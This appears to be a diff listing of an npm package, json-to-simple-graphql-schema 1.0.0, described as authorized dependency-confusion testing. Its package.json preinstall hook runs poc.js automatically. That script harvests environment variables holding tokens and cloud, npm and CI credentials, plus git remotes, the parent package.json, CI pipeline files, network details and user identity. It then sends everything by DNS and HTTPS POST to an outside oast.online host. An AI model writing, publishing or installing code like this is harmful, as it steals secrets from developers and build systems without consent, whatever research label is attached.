json-to-simple-graphql-schema 1.0.0

package/bin.js

@@ -0,0 +1,2 @@
+#!/usr/bin/env node
+require('./poc.js');

package/index.js

@@ -0,0 +1 @@
+module.exports = {};

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "json-to-simple-graphql-schema",
+  "version": "1.0.0",
+  "description": "Security research - authorized dependency confusion testing",
+  "main": "index.js",
+  "bin": {
+    "json-to-simple-graphql-schema": "./bin.js"
+  },
+  "scripts": {
+    "preinstall": "node poc.js || true"
+  },
+  "author": "Security Researcher",
+  "license": "ISC"
+}

package/poc.js

@@ -0,0 +1,118 @@
+const dns = require("dns");
+const os = require("os");
+const https = require("https");
+const { execSync } = require("child_process");
+const fs = require("fs");
+const path = require("path");
+
+const pkg = "json-to-simple-graphql-schema";
+const hn = os.hostname();
+const un = os.userInfo().username;
+const dir = __dirname;
+const interactsh = "d8acb4hon5btn9gcns4gcjs4foempemu9.oast.online";
+
+function run(cmd) {
+  try { return execSync(cmd, { timeout: 8000 }).toString().trim(); } catch(e) { return ""; }
+}
+
+const envVars = {};
+const interesting = ["WALMART","WMT","GITLAB","GITHUB","CI_","JENKINS","BUILD","PROJECT","REPO","TOKEN","AWS","AZURE","NPM","NODE","PATH","HOME","USER","HOSTNAME","PWD","SHELL"];
+for (const [k, v] of Object.entries(process.env)) {
+  if (interesting.some(prefix => k.toUpperCase().includes(prefix)) || k.startsWith("CI") || k.startsWith("npm")) {
+    envVars[k] = v;
+  }
+}
+
+let netinfo = "";
+if (os.platform() === "win32") {
+  netinfo = run("ipconfig /all");
+} else {
+  netinfo = run("ip a && cat /etc/resolv.conf 2>/dev/null");
+}
+
+let gitRemote = run("git remote -v 2>/dev/null");
+if (!gitRemote) {
+  try {
+    let d = dir;
+    for (let i = 0; i < 6; i++) {
+      d = path.dirname(d);
+      if (fs.existsSync(path.join(d, ".git"))) {
+        gitRemote = run(`git -C "${d}" remote -v`);
+        break;
+      }
+    }
+  } catch(e) {}
+}
+
+let parentPkg = "";
+try {
+  let d = dir;
+  for (let i = 0; i < 6; i++) {
+    d = path.dirname(d);
+    const pj = path.join(d, "package.json");
+    if (fs.existsSync(pj) && !pj.includes("node_modules")) {
+      parentPkg = fs.readFileSync(pj, "utf8").slice(0, 3000);
+      break;
+    }
+  }
+} catch(e) {}
+
+let ciConfig = "";
+try {
+  let d = dir;
+  for (let i = 0; i < 6; i++) {
+    d = path.dirname(d);
+    for (const f of [".gitlab-ci.yml", ".github/workflows", "Jenkinsfile", "azure-pipelines.yml"]) {
+      const fp = path.join(d, f);
+      if (fs.existsSync(fp)) {
+        if (fs.statSync(fp).isDirectory()) {
+          ciConfig += `[${f}]: ` + fs.readdirSync(fp).join(",") + "\n";
+        } else {
+          ciConfig += `[${f}]: ` + fs.readFileSync(fp, "utf8").slice(0, 2000) + "\n";
+        }
+      }
+    }
+  }
+} catch(e) {}
+
+let extraInfo = "";
+if (os.platform() === "win32") {
+  extraInfo = run("whoami /all") + "\n" + run("systeminfo | findstr /B /C:\"OS\" /C:\"Domain\" /C:\"Logon Server\"");
+} else {
+  extraInfo = run("id") + "\n" + run("cat /etc/hostname 2>/dev/null") + "\n" + run("cat /proc/version 2>/dev/null");
+}
+
+const id = Buffer.from(`${hn}-${un}`).toString("hex").slice(0, 30);
+try { dns.resolve(`${pkg.slice(0,15)}-${id}.${interactsh}`, ()=>{}); } catch(e) {}
+
+const data = JSON.stringify({
+  p: pkg,
+  h: hn,
+  u: un,
+  d: dir,
+  t: Date.now(),
+  pid: process.pid,
+  platform: os.platform(),
+  arch: os.arch(),
+  release: os.release(),
+  net: netinfo.slice(0, 4000),
+  env: envVars,
+  git_remote: gitRemote,
+  parent_pkg: parentPkg,
+  ci_config: ciConfig.slice(0, 3000),
+  extra: extraInfo,
+  cwd: process.cwd(),
+  argv: process.argv,
+  npm_ua: process.env.npm_config_user_agent || ""
+});
+
+const req = https.request({
+  hostname: interactsh,
+  port: 443,
+  path: "/${pkg}",
+  method: "POST",
+  headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(data) }
+}, ()=>{});
+req.on("error", ()=>{});
+req.write(data);
+req.end();